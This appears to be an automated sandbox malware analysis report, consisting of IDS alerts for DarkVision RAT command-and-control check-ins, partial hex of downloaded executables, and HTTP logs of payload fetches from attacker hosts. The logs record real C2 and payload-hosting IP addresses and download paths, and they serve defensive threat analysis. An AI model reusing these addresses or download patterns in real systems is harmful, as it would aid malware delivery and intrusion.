Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49783 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49784 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49787 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49790 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49788 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49792 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49795 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49794 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49798 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49800 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49797 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49799 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49802 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49803 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49808 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49804 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49811 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49805 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49812 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49810 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49807 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49816 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49821 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49814 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49817 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49825 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49829 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49818 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49813 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49826 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49828 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49831 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49833 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49809 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49834 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49820 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49835 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49815 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49822 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49832 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49838 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49837 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49823 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49793 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49824 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49827 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49819 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49830 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49742 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49785 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49796 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49786 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49806 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49836 -> 82.29.67.160:443
                    Source: Malware configuration extractorIPs: 82.29.67.160
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeFile created: 9f4678b.exe.18.dr
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.22.1 | Date: Sun, 06 Apr 2025 11:44:06 GMT | Content-Type: application/octet-stream | Content-Length: 2011136 | Last-Modified: Sat, 05 Apr 2025 21:25:58 GMT | Connection: keep-alive | ETag: "67f19fe6-1eb000" | Accept-Ranges: bytes | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 14 fa ce 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 ba 00 00 00 ec 19 00 00 00 00 00 3a e7 2e 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 e0 43 00 00 04 00 00 00 00 00 00 02 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 eb 31 00 3c 00 00 00 00 f0 42 00 66 ef 00 00 00 b9 42 00 90 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 25 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 b9 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 2a 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 ba 18 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c8 07 00 00 00 c0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 63 76 30 00 00 00 00 00 8b 41 0b 00 00 d0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 63 76 31 00 00 00 00 00 50 00 00 00 00 20 25 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 76 32 00 00 00 00 00 90 b9 1d 00 00 30 25 00 00 ba 1d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 66 ef 00 00 00 f0 42 00 00 f0 00 00 00 c0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.22.1 | Date: Sun, 06 Apr 2025 11:44:13 GMT | Content-Type: application/octet-stream | Content-Length: 1400832 | Last-Modified: Sat, 22 Mar 2025 01:09:32 GMT | Connection: keep-alive | ETag: "67de0dcc-156000" | Accept-Ranges: bytes | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 bc 0b de 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 3a 07 00 00 ca 01 00 00 00 00 00 41 3f 2a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 2b 00 00 04 00 00 5f c9 15 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 b9 24 00 a0 00 00 00 00 c0 2b 00 b2 01 00 00 a0 4f 2b 00 bc 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f5 38 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 52 01 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 6d 00 00 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f4 3e 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 73 30 30 00 00 00 00 00 68 ee 0c 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 30 31 00 00 00 00 00 a0 00 00 00 00 50 16 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 30 32 00 00 00 00 00 5c 57 15 00 00 60 16 00 00 58 15 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 b2 01 00 00 00 c0 2b 00 00 02 00 00 00 5e 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 4.28.136.57
Source: Joe Sandbox View | IP Address: 104.26.9.202
Source: Joe Sandbox View | IP Address: 107.174.192.179
Source: Joe Sandbox View | ASN Name: NTLGB
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 104.26.9.202:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49698 -> 104.26.9.202:443
Source: global traffic | HTTP traffic detected: GET /ZATFQO HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: grabify.link
Source: global traffic | HTTP traffic detected: GET /images/pixel.png HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: grabify.link | Cookie: g_session=eyJpdiI6Ijk5TXlFYUU4eFVRM0hHWWVUeUVRd2c9PSIsInZhbHVlIjoiUVV0MkhFWDNKUGEweHNISFFtanBHSkN3NTB0ejkzRWwyRFZLcTRUUW0yQ3M4N09mbWlXTnVDRGhtUy9uUlBWbWdNeHQ1aVdhcmdlZTQ5U1RWWUxKZ3QwV2ZBNkNVVUlweUZQR2F2a2VxMXVMZ083K0F6NXF0dnNMcis2Y3FIUWoiLCJtYWMiOiI5M2EzOGFjYTA4OTM0ODgyN2VmMTgyOTcwMmM4NTJkODZkNzc3YzY3MjNhZDQ3NGVmNjliODg1ZDI0ZGFhMmJhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJvSE93YVV1ZlFJcTBIMENXc0pYOEE9PSIsInZhbHVlIjoia0tWUHlIQndYMG14VndnT1hlVmNLbVhLTitSQ2J5RFJIZ1RxYkNrUFVLcWdJSFFBczMxeXpRYk01NEk4cTBFN3JEVmJ1WWc1enY0NHl6SERrSXhBbUtEYmgvWGJTSC90SmdEZVRlYUR1VkJQV0lCS3BSUFdiU0MzeUdGZzViRjkiLCJtYWMiOiI1YWJhMmFmMjRmNTZmYTgwZWRiZWJmNWU3OGJkMjA5YjFhMzk2OTY0OTJmNDgwNzllYzVjZDE3MjdkM2Q1MGM4IiwidGFnIjoiIn0%3D
Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /data/003 HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: 107.174.192.179
Source: global traffic | HTTP traffic detected: GET /clean HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: 107.174.192.179
Source: global traffic | HTTP traffic detected: HEAD /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-0 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-16383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=16384-32767 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=32768-49151 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=49152-65535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=81920-98303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=98304-114687 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=114688-131071 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=65536-81919 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=131072-163839 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=163840-196607 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=196608-229375 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=229376-262143 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=262144-294911 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=294912-327679 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=327680-360447 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=360448-393215 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=393216-458751 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=458752-524287 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=524288-589823 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=589824-655359 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
